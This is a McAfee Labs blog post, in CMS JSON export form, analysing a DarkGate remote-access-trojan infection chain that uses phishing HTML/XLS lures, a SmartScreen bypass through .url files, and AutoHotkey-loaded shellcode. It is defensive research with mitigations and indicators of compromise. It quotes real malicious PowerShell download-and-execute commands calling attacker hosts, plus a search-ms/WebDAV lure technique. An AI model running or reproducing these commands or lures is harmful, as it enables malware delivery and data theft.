{"id":190356,"date":"2024-04-29T11:09:03","date_gmt":"2024-04-29T18:09:03","guid":{"rendered":"https:\/\/www.mcafee.com\/blogs\/?p=190356"},"modified":"2024-04-29T11:09:03","modified_gmt":"2024-04-29T18:09:03","slug":"the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen","status":"publish","type":"post","link":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/","title":{"rendered":"The Darkgate Menace: Leveraging Autohotkey & Attempt to Evade Smartscreen"},"content":{"rendered":"

Authored by Yashvi Shah, Lakshya Mathur and Preksha Saxena<\/em><\/p>\n

McAfee Labs has recently uncovered a novel infection chain associated with DarkGate malware. This chain commences with an HTML-based entry point and progresses to exploit the AutoHotkey utility in its subsequent stages. DarkGate, a Remote Access Trojan (RAT) developed using Borland Delphi, has been marketed as a Malware-as-a-Service (MaaS) offering on a Russian-language cybercrime forum since at least 2018. This malicious software boasts an array of functionalities, such as process injection, file download and execution, data theft, shell command execution, keylogging capabilities, among others. Following is the spread of DarkGate observed in our telemetry for last three months:<\/p>\n

\"\"<\/center><\/p>\n

Figure 1: Geo-Distribution of DarkGate<\/p>\n

DarkGate\u2019s attempt to bypass Defender Smartscreen<\/strong><\/h2>\n

Additionally, DarkGate incorporates numerous evasion tactics to circumvent detection. DarkGate notably circumvented Microsoft Defender SmartScreen, prompting Microsoft to subsequently release a patch to address this vulnerability.<\/p>\n

In the previous year, CVE-2023-36025 (https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2023-36025<\/a> ) was identified and subsequently patched https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2023-36025<\/a> . CVE-2023-36025 is a vulnerability impacting Microsoft Windows Defender SmartScreen. This flaw arises from the absence of proper checks and corresponding prompts related to Internet Shortcut (.url) files. Cyber adversaries exploit this vulnerability by creating malicious .url files capable of downloading and executing harmful scripts, effectively evading the warning and inspection mechanisms of Windows Defender SmartScreen. This year, same way, CVE-2024-21412 (https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2024-21412<\/a> ) was identified and patched. This vulnerability is about \u201cInternet Shortcut Files Security Feature Bypass Vulnerability\u201d.<\/p>\n

Infection Chain<\/strong><\/h2>\n

McAfee Labs has identified two distinct initial vectors carrying identical DarkGate shellcode and payload. The first vector originates from an HTML file, while the second begins with an XLS file. We will delve into each chain individually to unveil their respective mechanisms. Below is the detailed infection chain for the same:<\/p>\n

\"\"<\/center><\/p>\n

Figure 2: Infection Chain<\/p>\n

Infection from HTML:<\/strong><\/h2>\n

The infection chain initiates with a phishing HTML page masquerading as a Word document. Users are prompted to open the document in “Cloud View” (shown in the figure below), creating a deceptive lure for unwitting individuals to interact with malicious content.<\/p>\n

\"\"<\/center><\/p>\n

Figure 3: HTML page<\/p>\n

Upon clicking “Cloud View,” users are prompted to grant permission to open Windows Explorer, facilitating the subsequent redirection process.<\/p>\n

\"\"<\/center><\/p>\n

Figure 4: Prompt confirming redirection to Windows Explorer<\/p>\n

Upon granting permission and opening Windows Explorer, users encounter a file depicted within the Windows Explorer interface. The window title prominently displays “\\\\onedrive.live.com,” adding a veneer of legitimacy to the purported “Cloud View” experience.<\/p>\n

\"\"<\/p>\n

Figure 5: Share Internet Shortcut via SMB<\/p>\n

In our investigation, we sought to trace the origin of the described phishing scheme back to its parent HTML file. Upon inspection, it appears that the highlighted content in the image may be a string encoded in reverse Base64 format. This suspicion arises from the presence of a JavaScript function (shown in the figure below) designed to reverse strings, which suggests an attempt to decode or manipulate encoded data.<\/p>\n

\"\"<\/center><\/p>\n

Figure 6: Javascript in HTML code<\/p>\n

On reversing and base64 decoding the yellow highlighted content in Figure 6, we found:<\/p>\n

\"\"<\/p>\n

Figure 7: WebDAV share<\/p>\n

The URL utilizes the “search-ms” application protocol to execute a search operation for a file named “Report-26-2024.url”. The “crumb” parameter is employed to confine the search within the context of the malicious WebDAV share, restricting its scope. Additionally, the “DisplayName” element is manipulated to mislead users into believing that the accessed resource is associated with the legitimate “onedrive.live.com” folder, thereby facilitating deception.<\/p>\n

Hence, the presence of “onedrive.live.com” in the Windows Explorer window title is a direct consequence of the deceptive manipulation within the URL structure.<\/p>\n

The file is an Internet Shortcut (.url) file, containing the following content:<\/p>\n

\"\"<\/center><\/p>\n

Figure 8: content of .URL file<\/p>\n

The .url files serve as straightforward INI configuration files, typically consisting of a “URL=” parameter indicating a specific URL. In our scenario, the URL parameter is defined as follows: URL=file:\/\/170.130.55.130\/share\/a\/Report-26-2024.zip\/Report-26-2024.vbs.<\/p>\n

Upon execution of the .url file, it will initiate the execution of the VBScript file specified in the URL parameter. This process allows for the automatic execution of the VBScript file, potentially enabling the execution of malicious commands or actions on the system.<\/p>\n

The vulnerability CVE-2023-36025 (https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2023-36025<\/a> ) pertains to Microsoft Windows Defender SmartScreen failing to issue a security prompt prior to executing a .url file from an untrusted source. Attackers exploit this by constructing a Windows shortcut (.url) file that sidesteps the SmartScreen protection prompt. This evasion is achieved by incorporating a script file as a component of the malicious payload delivery mechanism. Although Microsoft has released a patch https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2023-36025<\/a> to address this vulnerability, it remains exploitable in unpatched versions of Windows.<\/p>\n

If your system is not patched and updated, you will not see any prompt. However, if your system is updated, you will encounter a prompt like:<\/p>\n

\"\"<\/center><\/p>\n

Figure 9: SmartScreen prompt<\/p>\n

On allowing execution, the vbs file is dropped at C:\\Users\\admin\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\U4IRGC29. This file will run automatically on execution of url file and we get the following process tree:<\/p>\n

\"\"<\/center><\/p>\n

Figure 10: Process tree<\/p>\n

Following are the command lines:<\/p>\n

    \n
  • “C:\\Windows\\System32\\WScript.exe” “C:\\Users\\admin\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\U4IRGC29\\Report-26-2024[1].vbs”\n
      \n
    • “C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe” -Command Invoke-Expression (Invoke-RestMethod -Uri ‘withupdate.com\/zuyagaoq’)\n
        \n
      • \\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1<\/li>\n
      • “C:\\rjtu\\AutoHotkey.exe” C:\/rjtu\/script.ahk<\/li>\n
      • “C:\\Windows\\system32\\attrib.exe” +h C:\/rjtu\/<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n

        The sequence of commands begins with the execution of the VBScript file located at “C:\\Users\\admin\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\U4IRGC29\\Report-26-2024[1].vbs”. This VBScript subsequently utilizes PowerShell to execute a script obtained from the specified URL (‘withupdate.com\/zuyagaoq’) via the Invoke-RestMethod cmdlet. Upon executing the downloaded script, it proceeds to command and execute the AutoHotkey utility, employing a script located at the designated path (C:\/rjtu\/script.ahk). Subsequently, the final command utilizes the attrib tool to set the hidden attribute (+h) for the specified directory (C:\/rjtu\/).<\/p>\n

        Inspecting the URL “withupdate.com\/zuyagaoq” explicitly allows for a detailed understanding of the infection flow:<\/p>\n

        \"\"<\/center><\/p>\n

        Figure 11: Remote Script on the C2<\/p>\n

        This URL leads to a script:<\/p>\n

        \"\"
        \nFigure 12: Remote Script content<\/center>Reformatting, we get:<\/p>\n

        \"\"<\/center><\/p>\n

        Figure 13: Remote script content<\/p>\n

        Explanation of the script:<\/p>\n

          \n
        • ni ‘C:\/rjtu\/’ -Type Directory -Force<\/strong>: This command creates a new directory named “rjtu” in the root of the C drive if it doesn’t already exist.<\/li>\n
        • cd ‘C:\/rjtu\/’<\/strong>: This changes the current directory to the newly created “rjtu” directory.<\/li>\n
        • Invoke-WebRequest -Uri “http:\/\/withupdate.com\/oudowibspr” -OutFile ‘C:\/rjtu\/temp_AutoHotkey.exe’<\/strong>: This command downloads a file from the specified URL and saves it as “temp_AutoHotkey.exe” in the “rjtu” directory.<\/li>\n
        • Invoke-WebRequest -Uri “http:\/\/withupdate.com\/rwlwiwbv” -OutFile ‘C:\/rjtu\/script.ahk’<\/strong>: This downloads a file named “script.ahk” from another specified URL and saves it in the “rjtu” directory.<\/li>\n
        • Invoke-WebRequest -Uri “http:\/\/withupdate.com\/bisglrkb” -OutFile ‘C:\/rjtu\/test.txt’<\/strong>: This downloads a file named “test.txt” from yet another specified URL and saves it in the “rjtu” directory.<\/li>\n
        • start ‘C:\/rjtu\/AutoHotkey.exe’ -a ‘C:\/rjtu\/script.ahk’<\/strong>: This command starts the executable “AutoHotkey.exe” located in the “rjtu” directory and passes “script.ahk” file as an argument.<\/li>\n
        • attrib +h ‘C:\/rjtu\/’<\/strong>: This sets the hidden attribute for the “rjtu” directory.<\/li>\n<\/ul>\n

          Checking \u201cC:\/rjtu\u201d:<\/p>\n

          \"\"<\/center><\/p>\n

          Figure 14: Dropped folder<\/p>\n

          AutoHotkey is a scripting language that allows users to automate tasks on a Windows computer. It can simulate keystrokes, mouse movements, and manipulate windows and controls. By writing scripts, users can create custom shortcuts, automate repetitive tasks, and enhance productivity.<\/p>\n

          To execute an AutoHotkey script, it is passed as a parameter to the AutoHotkey executable (autohotkey.exe).<\/p>\n

          Following is the ahk script file content:<\/p>\n

          \"\"<\/center><\/p>\n

          Figure 15: Content of .ahk script<\/p>\n

          There are a lot of comments added in the script, simplifying the script, we get:<\/p>\n

          \"\"<\/center><\/p>\n

          Figure 16: .ahk script after removing junk<\/p>\n

          This script reads the content of “test.txt” into memory, allocates a memory region in the process’s address space, writes the content of “test.txt” as hexadecimal bytes into that memory region, and finally, it executes the content of that memory region as a function. This script seems to be executing instructions stored in “test.txt”.<\/p>\n

          Now, it’s confirmed that the shellcode resides within the contents of “test.txt”. This is how the text.txt appears:<\/p>\n

          \"\"<\/center><\/p>\n

          Figure 17: Content of test.txt<\/p>\n

          We analyzed the memory in use for Autohotkey.exe.<\/p>\n

          \"\"
          \nFigure 18: Memory of running instance of AutoHotKey.exe<\/center>We dumped the memory associated with it and found that it was the same as the content in test.txt.<\/p>\n

          \"\"<\/center><\/p>\n

          Figure 19: Memory dump of running AutoHotKey.exe same as test.txt<\/p>\n

          This is the shellcode present here. \u00a0The first 6 bytes are assembly instructions:<\/p>\n

          \"\"<\/center>Figure 20: Shellcode A in the beginning<\/p>\n

          Following the jump instructions of 3bf bytes, we reach the same set of instructions again:<\/p>\n

          \"\"<\/center><\/p>\n

          Figure 21: Same Shellcode A after jump<\/p>\n

          This means another jump with be taken for another 3bf bytes:<\/p>\n

          \"\"<\/center><\/p>\n

          Figure 22: Same Shellcode A one more time<\/p>\n

          We have encountered same set of instructions again, taking another jump we reach to:<\/p>\n

          \"\"<\/center><\/p>\n

          Figure 23: New Shellcode B found next.<\/p>\n

          These bytes are again another shellcode and the region highlighted in yellow(in the figure below) is a PE file. The Instruction pointer is not at the PE currently. This shellcode needs to be decoded first.<\/p>\n

          \"\"<\/center><\/p>\n

          Figure 24: Shellcode B followed by PE file highlighted<\/p>\n

          This shellcode suggests adding 71000 to the current offset and instruction pointer will be at the new location. The current offset is B3D, adding 71000 makes it 71B3D. Checking 71B3D, we get:<\/p>\n

          \"\"<\/center><\/p>\n

          Figure 25: After debugging found next Shellcode C<\/p>\n

          This is again now one more set of instructions in shellcode. This is approximately 4KB in size and is appended at the end of the file.<\/p>\n

          \"\"<\/center><\/p>\n

          Figure 26: Shellcode C directing to entry point of the PE file<\/p>\n

          Upon debugging this code, we figured out that in marked \u201ccall eax\u201d instruction, eax has the address of the entry point of the final DarkGate payload. Hence this instruction finally moves the Instruction Pointer to the entry point of the PE file. This goes to the same region marked in yellow in Figure 24.<\/p>\n

          This is the final DarkGate payload which is a Delphi-compiled executable file:<\/p>\n

          \"\"<\/center><\/p>\n

          Figure 27: Darkgate payload.<\/p>\n

          Upon this, we see all the network activity happening to C2 site:<\/p>\n

          \"\"<\/center><\/p>\n

          Figure 28: Network Communication<\/p>\n

          \"\"<\/center><\/p>\n

          Figure 29: C2 IP address<\/p>\n

          The exfiltration is done to the IP address 5.252.177.207.<\/p>\n

          Persistence:<\/strong><\/p>\n

          For maintaining persistence, a .lnk file is dropped in startup folder:<\/p>\n

          \"\"<\/center><\/p>\n

          Figure 30: Persistence<\/p>\n

          Content of lnk file:<\/p>\n

          \"\"<\/center><\/p>\n

          Figure 31: Content of .lnk used for persistence<\/p>\n

          The shortcut file (lnk) drops a folder named “hakeede” in the “C:\\ProgramData” directory.<\/p>\n

          \"\"<\/center><\/p>\n

          Figure 32: Folder dropped in “C:\\ProgramData”<\/p>\n

          Inside this folder, all the same files are present:<\/p>\n

          \"\"<\/center><\/p>\n

          Figure 33: Same set of files present in dropped folder<\/p>\n

          Again, the ahk file is executed with the help of Autohotkey.exe and shellcode present in test.txt is executed. These files have the same SHA256 value, differing only in their assigned names.<\/p>\n

          Infection from XLS:<\/strong><\/p>\n

          The malicious excel file asks the user to click on \u201cOpen\u201d to view the content properly.<\/p>\n

          \"\"<\/p>\n

          Figure 34: XLS sample<\/p>\n

          Upon clicking on \u201cOpen\u201d button, user gets the following prompt warning the user before opening the file.<\/p>\n

          \"\"<\/center><\/p>\n

          Figure 35: XLS files trying to download and run VBS file<\/p>\n

          For our analysis, we allowed the activity by clicking on \u201cOK\u201d. Following this we got the process tree as:<\/p>\n

          \"\"<\/center><\/p>\n

          Figure 36: Process tree from Excel file<\/p>\n

          The command lines are:<\/p>\n

            \n
          • “C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE” “C:\\Users\\admin\\Documents\\Cluster\\10-apr-xls\\1a960526c132a5293e1e02b49f43df1383bf37a0bbadd7ba7c106375c418dad4.xlsx”\n
              \n
            • “C:\\Windows\\System32\\WScript.exe” “\\\\45.89.53.187\\s\\MS_EXCEL_AZURE_CLOUD_OPEN_DOCUMENT.vbs”\n
                \n
              • “C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe” -Command Invoke-Expression (Invoke-RestMethod -Uri ‘103.124.106.237\/wctaehcw’)\n
                  \n
                • \\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1<\/li>\n
                • “C:\\kady\\AutoHotkey.exe” C:\/kady\/script.ahk<\/li>\n
                • “C:\\Windows\\system32\\attrib.exe” +h C:\/kady\/<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n

                  The file it gets from \u201c103.124.106[.]237\/wctaehcw\u201d has the following content:<\/p>\n

                  \"\"<\/center><\/p>\n

                  Figure 37: Remote script simliar to previous chain<\/p>\n

                  From this point onward, the infection process mirrors the previously discussed chain. All three files, including AutoHotKey.exe, a script file, and a text file, are downloaded, with identical artifacts observed throughout the process.<\/p>\n

                  Mitigation:<\/strong><\/p>\n

                    \n
                  • Verify Sender Information<\/li>\n
                  • Think Before Clicking Links and Warnings<\/li>\n
                  • Check for Spelling and Grammar Errors<\/li>\n
                  • Be Cautious with Email Content<\/li>\n
                  • Verify Unusual Requests<\/li>\n
                  • Use Email Spam Filters<\/li>\n
                  • Check for Secure HTTP Connections<\/li>\n
                  • Delete Suspicious Emails<\/li>\n
                  • Keep Windows and Security Software Up to date<\/li>\n<\/ul>\n

                    Indicators of Compromise (IoCs):<\/strong><\/p>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
                    File<\/strong><\/td>\nHash<\/strong><\/td>\n<\/tr>\n
                    Html file<\/td>\n196bb36f7d63c845afd40c5c17ce061e320d110f28ebe8c7c998b9e6b3fe1005<\/td>\n<\/tr>\n
                    URL file<\/td>\n2b296ffc6d173594bae63d37e2831ba21a59ce385b87503710dc9ca439ed7833<\/td>\n<\/tr>\n
                    VBS<\/td>\n038db3b838d0cd437fa530c001c9913a1320d1d7ac0fd3b35d974a806735c907<\/td>\n<\/tr>\n
                    autohotkey.exe<\/td>\n897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb<\/td>\n<\/tr>\n
                    AHK script<\/td>\ndd7a8b55e4b7dc032ea6d6aed6153bec9b5b68b45369e877bb66ba21acc81455<\/td>\n<\/tr>\n
                    test.txt<\/td>\n4de0e0e7f23adc3dd97d498540bd8283004aa131a59ae319019ade9ddef41795<\/td>\n<\/tr>\n
                    DarkGate exe<\/td>\n6ed1b68de55791a6534ea96e721ff6a5662f2aefff471929d23638f854a80031<\/td>\n<\/tr>\n
                    IP<\/td>\n5.252.177.207<\/td>\n<\/tr>\n
                    XLS file<\/td>\n1a960526c132a5293e1e02b49f43df1383bf37a0bbadd7ba7c106375c418dad4<\/td>\n<\/tr>\n
                    VBS<\/td>\n2e34908f60502ead6ad08af1554c305b88741d09e36b2c24d85fd9bac4a11d2f<\/td>\n<\/tr>\n
                    LNK file<\/td>\n10e362e18c355b9f8db9a0dbbc75cf04649606ef96743c759f03508b514ad34e<\/td>\n<\/tr>\n
                    IP<\/td>\n103.124.106.237<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

                    Table 1: IOC table<\/p>\n","protected":false},"excerpt":{"rendered":"

                    Authored by Yashvi Shah, Lakshya Mathur and Preksha Saxena McAfee Labs has recently uncovered a novel infection chain associated with…<\/p>\n","protected":false},"author":695,"featured_media":190932,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[442],"tags":[],"coauthors":[4136],"class_list":["post-190356","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-mcafee-labs"],"acf":[],"yoast_head":"\nThe Darkgate Menace: Leveraging Autohotkey & Attempt to Evade Smartscreen | McAfee Blog<\/title>\n<meta name=\"description\" content=\"Authored by Yashvi Shah, Lakshya Mathur and Preksha Saxena McAfee Labs has recently uncovered a novel infection chain associated with DarkGate malware.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"The Darkgate Menace: Leveraging Autohotkey & Attempt to Evade Smartscreen | McAfee Blog\" \/>\n<meta property=\"og:description\" content=\"Authored by Yashvi Shah, Lakshya Mathur and Preksha Saxena McAfee Labs has recently uncovered a novel infection chain associated with DarkGate malware.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/\" \/>\n<meta property=\"og:site_name\" content=\"McAfee Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:published_time\" content=\"2024-04-29T18:09:03+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_021323.png\" \/>\n\t<meta property=\"og:image:width\" content=\"300\" \/>\n\t<meta property=\"og:image:height\" content=\"200\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"McAfee Labs\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@McAfee_Labs\" \/>\n<meta name=\"twitter:site\" content=\"@McAfee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"McAfee Labs\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"11 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/\"},\"author\":{\"name\":\"McAfee Labs\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\"},\"headline\":\"The Darkgate Menace: Leveraging Autohotkey & Attempt to Evade Smartscreen\",\"datePublished\":\"2024-04-29T18:09:03+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/\"},\"wordCount\":2301,\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_021323.png\",\"articleSection\":[\"McAfee Labs\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/\",\"name\":\"The Darkgate Menace: Leveraging Autohotkey & Attempt to Evade Smartscreen | McAfee Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_021323.png\",\"datePublished\":\"2024-04-29T18:09:03+00:00\",\"description\":\"Authored by Yashvi Shah, Lakshya Mathur and Preksha Saxena McAfee Labs has recently uncovered a novel infection chain associated with DarkGate malware.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/#primaryimage\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_021323.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_021323.png\",\"width\":300,\"height\":200},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Blog\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Other Blogs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"McAfee Labs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"The Darkgate Menace: Leveraging Autohotkey & Attempt to Evade Smartscreen\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"name\":\"McAfee Blog\",\"description\":\"Internet Security News\",\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\",\"name\":\"McAfee\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"width\":1286,\"height\":336,\"caption\":\"McAfee\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee\",\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.youtube.com\/McAfee\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\",\"name\":\"McAfee Labs\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"caption\":\"McAfee Labs\"},\"description\":\"McAfee Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. See our blog posts below for more information.\",\"sameAs\":[\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee_Labs\"],\"url\":\"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"The Darkgate Menace: Leveraging Autohotkey & Attempt to Evade Smartscreen | McAfee Blog","description":"Authored by Yashvi Shah, Lakshya Mathur and Preksha Saxena McAfee Labs has recently uncovered a novel infection chain associated with DarkGate malware.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"en_US","og_type":"article","og_title":"The Darkgate Menace: Leveraging Autohotkey & Attempt to Evade Smartscreen | McAfee Blog","og_description":"Authored by Yashvi Shah, Lakshya Mathur and Preksha Saxena McAfee Labs has recently uncovered a novel infection chain associated with DarkGate malware.","og_url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/","og_site_name":"McAfee Blog","article_publisher":"https:\/\/www.facebook.com\/McAfee\/","article_author":"https:\/\/www.facebook.com\/McAfee\/","article_published_time":"2024-04-29T18:09:03+00:00","og_image":[{"width":300,"height":200,"url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_021323.png","type":"image\/png"}],"author":"McAfee Labs","twitter_card":"summary_large_image","twitter_creator":"@McAfee_Labs","twitter_site":"@McAfee","twitter_misc":{"Written by":"McAfee Labs","Est. reading time":"11 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/#article","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/"},"author":{"name":"McAfee Labs","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad"},"headline":"The Darkgate Menace: Leveraging Autohotkey & Attempt to Evade 